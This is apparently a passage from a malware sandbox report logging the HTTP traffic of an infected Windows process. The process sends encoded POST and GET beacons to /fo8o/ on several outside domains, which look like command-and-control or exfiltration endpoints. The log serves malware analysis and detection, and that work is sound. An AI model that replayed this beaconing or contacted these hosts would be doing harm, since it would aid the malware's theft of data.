            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            10192.168.2.64973546.30.211.38805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:38.177252054 CEST825OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.antonio-vivaldi.mobi
            Origin: http://www.antonio-vivaldi.mobi
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.antonio-vivaldi.mobi/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 4d 54 6f 46 49 61 62 35 47 74 2f 56 71 57 4c 33 49 50 33 30 6f 6b 53 70 6c 44 4f 55 44 4e 4e 5a 47 39 32 35 76 4c 43 76 33 4e 42 58 4a 51 77 5a 51 34 62 46 4f 70 35 50 7a 68 78 53 61 78 48 69 6c 78 6d 67 43 6d 6e 6c 2f 4b 7a 38 59 2b 78 6c 49 62 77 48 41 59 2b 67 6d 7a 41 4c 7a 38 65 55 52 74 6e 77 70 57 38 4d 63 4a 71 33 7a 58 78 36 61 42 36 46 46 79 35 43 45 64 74 68 2b 4f 61 4b 67 4f 43 4d 61 56 61 59 41 45 50 46 6e 67 4e 78 72 36 72 62 43 48 32 2b 58 58 63 65 67 7a 54 7a 64 4b 37 59 57 78 57 2b 42 45 70 4f 51 6a 49 54 4a 69 68 69 56 67 4b 67 3d 3d
            Data Ascii: blWd=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/MToFIab5Gt/VqWL3IP30okSplDOUDNNZG925vLCv3NBXJQwZQ4bFOp5PzhxSaxHilxmgCmnl/Kz8Y+xlIbwHAY+gmzALz8eURtnwpW8McJq3zXx6aB6FFy5CEdth+OaKgOCMaVaYAEPFngNxr6rbCH2+XXcegzTzdK7YWxW+BEpOQjITJihiVgKg==
            Aug 2, 2024 13:51:38.848763943 CEST738INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Fri, 02 Aug 2024 11:51:38 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            11192.168.2.64973646.30.211.38805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:40.713829994 CEST1838OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.antonio-vivaldi.mobi
            Origin: http://www.antonio-vivaldi.mobi
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.antonio-vivaldi.mobi/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 30 54 70 77 45 61 62 65 79 74 34 56 71 57 42 58 49 43 33 30 70 32 53 70 73 4b 4f 55 50 64 4e 63 43 39 30 65 76 4c 45 65 33 4e 62 48 4a 51 2f 35 51 31 66 46 4f 77 35 4c 66 6c 78 53 4b 78 48 69 6c 78 6d 6d 47 6d 67 30 2f 4b 30 4d 59 39 32 6c 49 66 39 6e 42 78 2b 67 2f 49 41 4c 6e 73 65 43 68 74 6d 55 4e 57 35 36 49 4a 32 6e 7a 56 77 36 62 45 36 46 4a 58 35 43 5a 6d 74 67 4b 6f 61 4a 38 4f 43 72 6e 36 4a 70 34 44 65 32 6d 59 54 54 54 4d 73 4f 47 74 75 75 4c 74 4b 4e 5a 44 53 77 56 2b 30 2f 65 72 54 39 4a 47 6a 4d 38 63 47 33 55 38 73 54 51 48 61 33 67 6d 74 35 30 6f 35 74 63 35 55 70 51 39 55 74 35 61 33 37 58 63 58 4b 44 6f 44 31 6a 68 33 36 64 51 49 4e 76 67 4a 31 68 62 43 72 54 4f 6d 38 30 32 49 52 78 34 6d 51 30 46 68 61 34 42 68 38 69 67 4d 61 6d 31 58 72 33 54 66 46 35 4b 67 46 71 61 2b 41 6a 46 51 48 56 6b 75 32 6d 38 74 32 6c 4b 39 34 50 31 2b 6a 2f 78 51 [TRUNCATED]
            Data Ascii: blWd=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/0TpwEabeyt4VqWBXIC30p2SpsKOUPdNcC90evLEe3NbHJQ/5Q1fFOw5LflxSKxHilxmmGmg0/K0MY92lIf9nBx+g/IALnseChtmUNW56IJ2nzVw6bE6FJX5CZmtgKoaJ8OCrn6Jp4De2mYTTTMsOGtuuLtKNZDSwV+0/erT9JGjM8cG3U8sTQHa3gmt50o5tc5UpQ9Ut5a37XcXKDoD1jh36dQINvgJ1hbCrTOm802IRx4mQ0Fha4Bh8igMam1Xr3TfF5KgFqa+AjFQHVku2m8t2lK94P1+j/xQlMrPq1hzYh4ZjAnHGTK3OsPUImJYWb8zDaVr1pJqa4E3kYYjz9D6GAp/iVFVYRbIdXa4POnrxmotLG9WAY12xrl/rsuGakTOWrRJ3b9OJ3L5p/4eWWrWjVO/e8y/aJcj3rjV/DwgtUdHFjlzvZbjPWlJcuUeyUd2xCmd8BswQm6Y+a/hW97aJAxUA3ZsGjisRx7sknK0smfA9oXFl420yhQSs0s26MM8dPFj68tgR+nEVXjuhXgC8/2P03rDl49YhH8AIihppckUO4NqcFDf9EQZ8kR5eML53Vq0U9GPMq9QkBsxebKcEV1d5l+LP5XjvZBpZdV0ie7YiFp1pylrJEl2HCq9wdwWxgtyClhNLEnrOO4L22nCouvnvjmzr0vS+iDCNNZHUxuWfMjUbQT4wnZZnvmnNMSaxPIf/hJNBqiSgDN0wpcLD+OSegULAGfd4RhBgD0TBJDE9zdXKTwhHCa9NSLyMr3aWyi5p73OyGyFx1Jt4IGDwnbTKezGTQfrcb0g4z+PM7Pigpg51koxbqI2hCO3odJsgLGlQkKWBABBDVWt+5lokQGcgy2ku+pkwiqjSMLcHg0eKrnwpYlh2hcnl7txbYDyycdr30VeMoZzNxUVgPLhoCjxr2AUd4Dj9nTFs7hsZQ1GzVvb3Dzyk0gPhCqhK8AqBJ [TRUNCATED]
            Aug 2, 2024 13:51:41.360732079 CEST738INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Fri, 02 Aug 2024 11:51:41 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            12192.168.2.64973846.30.211.38805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:43.255455971 CEST531OUTGET /fo8o/?blWd=PTl5gU/3CD/Xhg5Nd1HWi+eKOiJURJRFTZuVmm6gfrwSjnBrSraU/0GdHAsD0mFxNrARF0zWd8CLwvHKbs6Za05B0b8lb0SJyq2CvxKSeitE8AGVnlTlldZE82pgolkPyTnRDO8=&Ixe=Apq4tPPXNdTp2 HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.antonio-vivaldi.mobi
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:51:43.897175074 CEST738INHTTP/1.1 404 Not Found
            Server: nginx/1.18.0 (Ubuntu)
            Date: Fri, 02 Aug 2024 11:51:43 GMT
            Content-Type: text/html; charset=UTF-8
            Content-Length: 564
            Connection: close
            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            13192.168.2.64973985.159.66.93805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:49.056546926 CEST783OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.magmadokum.com
            Origin: http://www.magmadokum.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 209
            Referer: http://www.magmadokum.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 62 4a 72 44 58 6d 7a 45 6b 6b 4b 2b 65 41 4e 6a 6e 42 2f 58 63 78 41 41 64 50 47 4a 53 64 6c 77 41 6f 2b 4c 59 71 50 65 6a 7a 49 30 2b 38 47 36 31 68 36 56 71 51 5a 2f 6e 41 31 35 43 52 7a 30 6f 38 31 47 64 7a 57 32 62 6b 49 42 59 36 52 64 37 4f 63 4a 47 69 32 32 38 68 6b 69 56 41 77 4b 42 66 6f 6d 64 51 57 2f 43 53 33 4a 47 2f 59 53 5a 70 63 58 66 74 30 42 75 77 6c 44 43 67 4f 4f 50 7a 4a 35 30 6b 54 61 43 73 48 69 48 6b 71 2f 30 30 2b 52 30 33 44 49 62 62 52 59 61 52 6d 70 56 78 77 2b 57 74 51 74 38 70 44 4d 45 33 66 48 4b 44 57 78 30 45 4d 51 34 48 77 47 67 79 62 75
            Data Ascii: blWd=nJfHJZySQmokbJrDXmzEkkK+eANjnB/XcxAAdPGJSdlwAo+LYqPejzI0+8G61h6VqQZ/nA15CRz0o81GdzW2bkIBY6Rd7OcJGi228hkiVAwKBfomdQW/CS3JG/YSZpcXft0BuwlDCgOOPzJ50kTaCsHiHkq/00+R03DIbbRYaRmpVxw+WtQt8pDME3fHKDWx0EMQ4HwGgybu
            Aug 2, 2024 13:51:49.833924055 CEST225INHTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Fri, 02 Aug 2024 11:51:49 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 19
            X-Rate-Limit-Reset: 2024-08-02T11:51:54.7200281Z


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            14192.168.2.64974085.159.66.93805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:51.599205017 CEST807OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.magmadokum.com
            Origin: http://www.magmadokum.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 233
            Referer: http://www.magmadokum.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 39 77 41 4a 69 4c 57 4c 50 65 67 7a 49 30 6d 73 47 2f 72 52 36 4f 71 51 55 63 6e 42 4a 35 43 52 50 30 6f 2b 74 47 65 44 71 31 61 30 49 44 56 61 52 44 6d 65 63 4a 47 69 32 32 38 68 67 49 56 41 6f 4b 42 4c 55 6d 53 56 71 77 4d 79 33 49 57 76 59 53 64 70 63 54 66 74 30 7a 75 78 49 6d 43 6c 43 4f 50 79 35 35 30 31 54 46 58 63 48 6b 44 6b 72 4c 38 55 6a 67 35 30 4b 35 45 36 30 35 44 6d 65 33 51 48 78 6b 4b 65 51 4f 75 35 6a 4f 45 31 48 31 4b 6a 57 62 32 45 30 51 71 51 38 68 76 47 2b 4e 69 51 44 5a 76 62 30 45 59 65 44 4f 54 51 68 2f 44 43 72 39 72 51 3d 3d
            Data Ascii: blWd=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo9wAJiLWLPegzI0msG/rR6OqQUcnBJ5CRP0o+tGeDq1a0IDVaRDmecJGi228hgIVAoKBLUmSVqwMy3IWvYSdpcTft0zuxImClCOPy5501TFXcHkDkrL8Ujg50K5E605Dme3QHxkKeQOu5jOE1H1KjWb2E0QqQ8hvG+NiQDZvb0EYeDOTQh/DCr9rQ==
            Aug 2, 2024 13:51:52.351591110 CEST225INHTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Fri, 02 Aug 2024 11:51:52 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 18
            X-Rate-Limit-Reset: 2024-08-02T11:51:54.7200281Z


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            15192.168.2.64974185.159.66.93805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:54.129615068 CEST1820OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.magmadokum.com
            Origin: http://www.magmadokum.com
            Cache-Control: no-cache
            Connection: close
            Content-Type: application/x-www-form-urlencoded
            Content-Length: 1245
            Referer: http://www.magmadokum.com/fo8o/
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Data Raw: 62 6c 57 64 3d 6e 4a 66 48 4a 5a 79 53 51 6d 6f 6b 61 71 44 44 56 42 76 45 6a 45 4b 2f 62 41 4e 6a 74 68 2f 54 63 78 38 41 64 4d 4c 55 54 6f 31 77 42 37 71 4c 57 73 54 65 76 54 49 30 76 4d 47 2b 72 52 36 44 71 52 39 56 6e 42 46 70 43 58 4c 30 71 64 6c 47 66 78 4f 31 52 30 49 44 4a 71 52 43 37 4f 63 6d 47 69 6d 79 38 67 51 49 56 41 6f 4b 42 4e 77 6d 62 67 57 77 4f 79 33 4a 47 2f 59 6b 5a 70 64 32 66 74 38 6a 75 78 4e 54 43 52 2b 4f 4d 53 70 35 35 6a 2f 46 56 38 48 6d 45 6b 72 54 38 55 76 37 35 30 6e 56 45 36 42 55 44 68 75 33 54 6d 77 4d 61 75 45 6d 38 62 43 70 5a 30 37 78 4b 47 4b 50 33 48 63 32 76 79 34 44 69 45 2b 48 36 48 72 46 69 4b 68 63 65 63 72 2b 61 55 59 77 4c 51 2b 36 33 73 63 54 68 32 45 66 54 73 59 6e 4a 78 53 73 4c 30 69 71 70 58 30 78 33 4b 4d 30 58 4f 43 65 38 58 52 63 44 54 56 67 68 69 78 65 41 37 76 38 67 59 46 69 2f 38 6b 65 73 73 4b 79 65 65 31 45 4f 76 4e 38 51 4a 4e 66 55 44 47 4d 67 2b 65 39 79 31 73 68 51 39 75 73 4b 54 73 73 4a 67 76 2f 6d 64 62 70 2f 6f 43 74 33 6c 49 64 32 [TRUNCATED]
            Data Ascii: blWd=nJfHJZySQmokaqDDVBvEjEK/bANjth/Tcx8AdMLUTo1wB7qLWsTevTI0vMG+rR6DqR9VnBFpCXL0qdlGfxO1R0IDJqRC7OcmGimy8gQIVAoKBNwmbgWwOy3JG/YkZpd2ft8juxNTCR+OMSp55j/FV8HmEkrT8Uv750nVE6BUDhu3TmwMauEm8bCpZ07xKGKP3Hc2vy4DiE+H6HrFiKhcecr+aUYwLQ+63scTh2EfTsYnJxSsL0iqpX0x3KM0XOCe8XRcDTVghixeA7v8gYFi/8kessKyee1EOvN8QJNfUDGMg+e9y1shQ9usKTssJgv/mdbp/oCt3lId22W4Y81k5HtKy5x22frMsbOotkvbhi646rremCShbroDUjUgsu6c7CjYLkKtFzmpXRGl3Ld7CbiBmuRiduyNdov15vLDVfDEui7tum9E7v4e63VvBdeC6joDS6shuFcb4J0muXndGqjsZzyJG0j/SslrqRihzqqCgho0HnUlciGFL3NXW+tWURlL1cCc4BMrepvUxTDjwpBzNzFaksp+A5VwcSc4WFI+aihmIJlg7EJs13kpMWCJX/+WbKYHKY3+T3bfyzWCTNQ6wAp6JjvaTYaz8GYfdHyQLYRPt4nFYWS02B9Y4/UuwPjSa2+S/+ZUJD0mFwOFpd/UaVEJy20CWWfgfqDZG8R2dMvnd7PuTUZ3ZEAWwkcs/3cUC8BnIK285v2IuvaiBXs2Nm0BQDOzoF2Wr+zhje86nlyoq6dmx782qZxlxWS6cEPhIofgX/UmovvfAfGxbswiBlIgjbQv43FPeWUYFq2OSc32m0PpdkKGDck+WQeFIbtTpAirxB84paDGX+UuBvs9oRlfN9YpWWrobTkUJVhTJMasV72SHqy2faJPw51w05Pabcfu+eGDafkuFamYllEy8B+eLT7rDEvS7Bt+lKe5myvGzvhNHaHBkghkeegmadgtcGD+ga1ZMod+TpSmNwN8uWspb1vuWNNnalfk2Rc8EgM [TRUNCATED]
            Aug 2, 2024 13:51:54.910922050 CEST225INHTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Fri, 02 Aug 2024 11:51:54 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 19
            X-Rate-Limit-Reset: 2024-08-02T11:51:59.7899409Z


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            16192.168.2.64974485.159.66.93805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:51:56.669017076 CEST525OUTGET /fo8o/?Ixe=Apq4tPPXNdTp2&blWd=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Host: www.magmadokum.com
            Connection: close
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
            Aug 2, 2024 13:51:57.419544935 CEST225INHTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Fri, 02 Aug 2024 11:51:57 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 19
            X-Rate-Limit-Reset: 2024-08-02T11:52:02.2922594Z


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            17192.168.2.64974591.195.240.94805700C:\Program Files (x86)\RjSlMTBtHFecsSmiWeXYnJopCqRthksFajZLjFLeKxwnWhBybNWDWOPmMKvpPtfQ\WOaBXdWwIJKzuV.exe
            TimestampBytes transferredDirectionData
            Aug 2, 2024 13:52:02.465368032 CEST786OUTPOST /fo8o/ HTTP/1.1
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Accept-Encoding: gzip, deflate, br
            Host: www.rssnewscast.com
            Origin: http://www.rssnewscast.com
